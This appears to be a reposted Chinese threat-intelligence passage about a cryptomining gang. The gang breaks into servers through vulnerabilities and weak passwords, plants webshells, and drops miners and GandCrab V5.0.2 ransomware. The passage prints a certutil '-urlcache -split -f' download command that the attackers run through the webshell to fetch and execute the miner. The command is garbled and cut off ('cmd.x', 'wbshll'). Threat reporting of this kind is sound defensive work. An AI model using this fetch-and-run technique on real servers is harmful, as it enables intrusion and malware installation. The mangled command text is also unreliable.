一、概述
前段时间,腾讯御见威胁情报中曾经披露了《Tomcat服务器被爆破入侵,企业遭遇GandCrab勒索病毒新变种与挖矿木马双重打击》的报告,近期我们再次监控到大量服务器被入侵进行挖矿,部分机器还被新版的GandCrabV5.0.2勒索病毒攻击。
通过该组织暴露的ftp地址进行分析发现,该组织疑似友商之前披露的“挖矿团伙”,为了秉承“谁先发现谁命名”以及情报互通、共享的原则,我们继续沿用友商对该团伙的命名。
二、分析
1、入侵路径该团伙利用多个漏洞以及弱口令进行入侵,入侵成功后,会上传wbshll,通过wbshll执行下载命令,下载挖矿木马并执行。
执行命令为:
cmd.x/ccrtutil.x-urlcach-split-f
转载请注明:http://www.wangguoqiangq.com/sglbly/7548.html
